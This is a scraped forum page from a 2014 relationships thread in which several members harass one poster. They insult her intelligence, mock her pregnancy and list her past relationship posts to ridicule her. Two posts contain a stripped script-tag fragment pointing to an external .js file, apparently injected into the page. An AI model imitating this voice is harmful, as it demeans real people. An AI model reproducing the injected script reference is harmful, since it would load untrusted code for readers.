Black Hair Media Forum Homepage
BHM BHM BHM
Forum Home Forum Home > Lets Talk > Relationships
  FAQ FAQ  Forum Search   Register Register  Login Login
Extensions Plus

Am I wrong?

Post Reply Post Reply Page  <1 678910 14>

Author
 Rating: Topic Rating: 1 Votes, Average 1.00  Topic Search Topic Search  Topic Options Topic Options
sexyandfamous View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (5) Thanks(5)   Quote sexyandfamous Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 1:38pm
Originally posted by Twisted_Angel Twisted_Angel wrote:

Lol see how I was talking to you and everyone jumps in...lol (I don't even bother reading from women who call them selves slow hoe, and man haters and an old ass bitter 58 year old woman)...

True lol never looking for love on bhm tho especially from black women too much jealousy.. but I never treat anyone else like im better than them..

Soon as it sounded like have a decent man

Everybody flips the script to make them feel better about themselves. You can tell by the responses who's actually in a good relationship themselves, or just a mans toy

So am I the man hater? I guess Midna is the slow hoe because she has been posting about her dates. I know you are referring to Printer when you say "bitter 58 year old"...... Congratulations, you contradicted yourself saying that you never treat anyone else like you are better, but you just did because we called you out on a "relationship" that won't turn out well.

You do not have a decent man, no one flipped anything to make him sound like sh!t, he NEVER sounded like a good man. You created a thread about how he drove reckless with your child on the back seat!

Delusional girls like you are the ones who think a disturbed person like him are "good man". You can't even spell! You are uneducated, have poor self-esteem, clearly have several issues but you want to talk sh!t about black women? You just stereotyped the whole race when you said we are jealous women.

Girl, bye, GTFO of this forum, it is for black women, and since we are "jealous", you shouldn't be here anymore.

No one is trying to feel better by telling you what's wrong with your relationship, that is called projecting, and you just did that by cussing people out and trying to point fingers at us. As if! I am not the one pregnant, coming to a forum to announce my pregnancy, posting pics of my pregnancy on the forum section about fitness (Body Types), writing threads about kegelmaster because I can't ask a question to my gynecologist since she thinks I am stupid, and posting threads about my boyfriend who drives reckless with a child and cusses his own mother.

FYI: From the responses and the thread itself we can see who is actually in a good relationship AND CLEARLY IT IS NOT YOU. (projection again)

**now go await on the corner for someone who hasn't called you out on your stupidity to reply here so you can reply to them one of the 25 versions of your "truth". **
Sponsored Links

juicifruit89 View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote juicifruit89 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 5:55pm
She had her mind made up before posting. Her post was used just for venting, not really to gain valuable insight. There are plenty of people who tend to think with emotions rather than logic, so never become too invested in anyone else's life drama--emotional/impulsive thinkers will almost always ignore others' advice. Sincerely, no offense but often they love an audience to share in their misery/pain/conflict.

If she lives a good life, great--if she doesn't, then it's a result of her choices and she'll have to deal accordingly. I've never willingly taken on the burden of feeling sorry for anyone when they have all of the tools to make good choices and they CHOOSE not to, for whatever reason. Everything in life is a choice--you don't HAVE to stay in a situation, you choose to.

I do enjoy Printer_Ink's postings however as someone who observes others and finds ways to avoid others' mistakes-- sometimes listening to older people's sage advice will make your life so much easier--why struggle when you don't HAVE to? Best of luck.

Edited by juicifruit89 - Apr 27 2014 at 5:59pm
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 9:47pm
Every thread you make consists of you dating a sh*tty guy and you suddenly defending him and attacking everyone else.

Do I need to link all your prior threads about your love life and how you'd predictably go from asking for advice about a relationship your instinct is warning you about to suddenly getting defensive and hailing the same relationship you doubted? You do this in every dick advice thread you make.

You poor thing. You're so used to being with less-than-stellar men, you think it's normal to be treated as less-than-stellar.

By the way, cute job with the slow ho thing.
That might be a better term for you though. Keep pregnant kegelmasteing even though it's not safe!
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 9:50pm
S&F yessss, that thread! I didn't even want to reply, she was willing to ignore her gynecologist to come here and get diagnosed on this forum!

Twisted, good job deleting the post. Hot mess.
Journey94 View Drop Down

Post Options Post Options   Thanks (1) Thanks(1)   Quote Journey94 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 10:18pm
This chick is a complete idiot, I can't even deal.
Journey94 View Drop Down

Post Options Post Options   Thanks (3) Thanks(3)   Quote Journey94 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 10:20pm
Sexyandfamous

Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 10:29pm
Hm hm hm, where do we begin..?< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

sexyandfamous View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote sexyandfamous Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 10:58pm
^^^^OMG that is so sad, I did not know the extent of her problems. I mean, I figured she had issues, but I didn't think it was that deep.
Twisted, you need to log out of BHM and seek help. BHM is not the place for advice for you; you are too stubborn, defensive and blind to see the truth. All you think is that we are a bunch of "jealous" women.

Please take a break from the internet, please stop going on Body Types and replying to a bunch of threads - you are pregnant, none of the ladies up there is, so your comments are irrelevant; you are seeking attention at the wrong place plus you obviously have too much time in your hands, which doesn't make sense when you have a small child and are pregnant. You need to fill that void, and an internet forum is not what you need. Please log out and seek therapy. You will damage your children because you only provide them with bad examples!!!
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (7) Thanks(7)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 27 2014 at 11:24pm
It's story time, ladies! All you jealous heifers, come sit down and enjoy the tales of all the fantastic men Twister has ran her heart and vagina ragged through! It's a series of tales sure to make you green with envy!
*Prepares a nice hot batch of tea* Careful, it's hot!
  • First we begin in 2010, a story called "A Long Distance Relationship!"
    Ah! I remember this guy! He was quite the tale! Twisted was dating a male online for a few months and was preparing to finally meet the strapping gentleman! The general advice is to simply talk to him for the sake of clarification and here we find Twisted has a history of men cheating on her. Twisted feels pretty sure about this one despite asking for advice, but the thread stays short and sweet thanks to not-many details about the relationship being disclosed other than it being an internet relationship- or long distance as she prefers to call it.

• May, 2010! Uh-oh! Things aren't going so well for Miss Twisted and her online liaison! Chapter "I'm Lost" They have a fight after 6 months of dating and Twisted asks us for advice. The man even outright insults her. The general consensus of the ladies of BHM is that they're both playing games and because this is an online relationship, it's not as deep as she makes it out to be. She's also advised to just end it due to how badly things have turned despite them never actually meeting in person.

Amazingly, Twisted agrees with each of the points listed by various members!

• Two months later in June 2010, Miss Twisted comes back in Chapter "Online Dating? What do you think?" presumably about the strapping gentlemen in the previous thread! She states he's crazy about her and she's crazy about him and believes he will buy her a ticket to California. Twisted then asks for advice on how to appear as a good woman to a man!

Because the thread was a relatively neutral thread, the general consensus is the ladies of BHM wishing her luck and to simply be safe.

• Chapter: Was I Wrong? June 11, 2010! Miss Twisted is jealous of her online boyfriend smoking weed with a half-naked woman. The guy claims to be able to control himself despite being under the influence of a drug and in the presence of a half-naked woman and does state he WILL be smoking with her again. The thread starts off on a negative and rather mixed note but the general agreed consensus is that because they've never met, this isn't really a true relationship but a precursor.

Members like MissCassC, Maximus Rex, and I- ElectricLady strongly warn against taking this relationship seriously. Miss Twisted calls us a mess. The rest of the thread is generally cosigning with not considering this a relationship. Twisted calls me thirsty for simply agreeing with the man despite me never insulting her. Eh, better than jealous.

• Laaaaater that same day, Miss Twisted creates another thread! Chapter "ENUFF WIT DA DAM WEED"! Miss Twisted is done with online dating! A strapping gentlemen Twister is friends with flirts with her but she is intimidated by his age and his heavy weed-smoking habits. The general consensus of the ladies of BHM is they agree with her opinion about people who smoke too much. Yay!

• Chapter "Is my man avoiding me?" August 3rd, 2010! Twisted and the strapping online gentleman are back on and she unfortunately feels he is avoiding her. :(  The general consensus is that yes, the same guy who she keeps making threads about is indeed avoiding her, she's wasting her time and can do so much better than him. The ladies of BHM are clearly getting tired of being asked for advice that is not being taken.

• 2011, a year of silence! Twisted did meet up with the guy, she got pregnant, they didn't work out.

• Chapter: "Should I light this old flame again?" July 2012. Miss Twisted is wondering about what could be with an old friend. The general consensus is to be careful, especially since she now has a kid. 

• Chapter: "Nvm" March 2013, a deleted post but the title had an angry emoticon so it probably got ugly. From what the comments suggest, she's unsure about the presumably current guy's emotional openness to her. 

• Chapter: "HELP CANCER MAN UPSETTwisted's current man is a little too emotional for comfort! We also find the past relationship was also abusive and this currently man drove recklessly with her baby in the car. ...Yikes. The general consensus is rather mixed, some say leave, some say talk, everyone else just raises their eyebrows at the more disturbing details. Twisted takes everything rather well despite the differing opinions and warns against falling for getting impregnated by guys selling you hopes and dreams.

• Chapter.. Am I Wrong? Twisted, pregnant after less than 6 months of dating but with a ring on her finger is living the life and we're all just jealous and bitter black women.

You go, girl! Big smile

< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
BBpants View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (3) Thanks(3)   Quote BBpants Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 12:11am
leave this poor woman alone LOL
Get Longer Healthier Faster Growing Hair
Get Healthier Stronger Longer Hair
Glam Twinz
Weave Connection
Human Hair Wigs
Wefting Training
Brazilian Hair
Brazilian Hair
Wig and Hair Extension on Amazon
 Post Reply Post Reply Page  <1 678910 14>
  Share Topic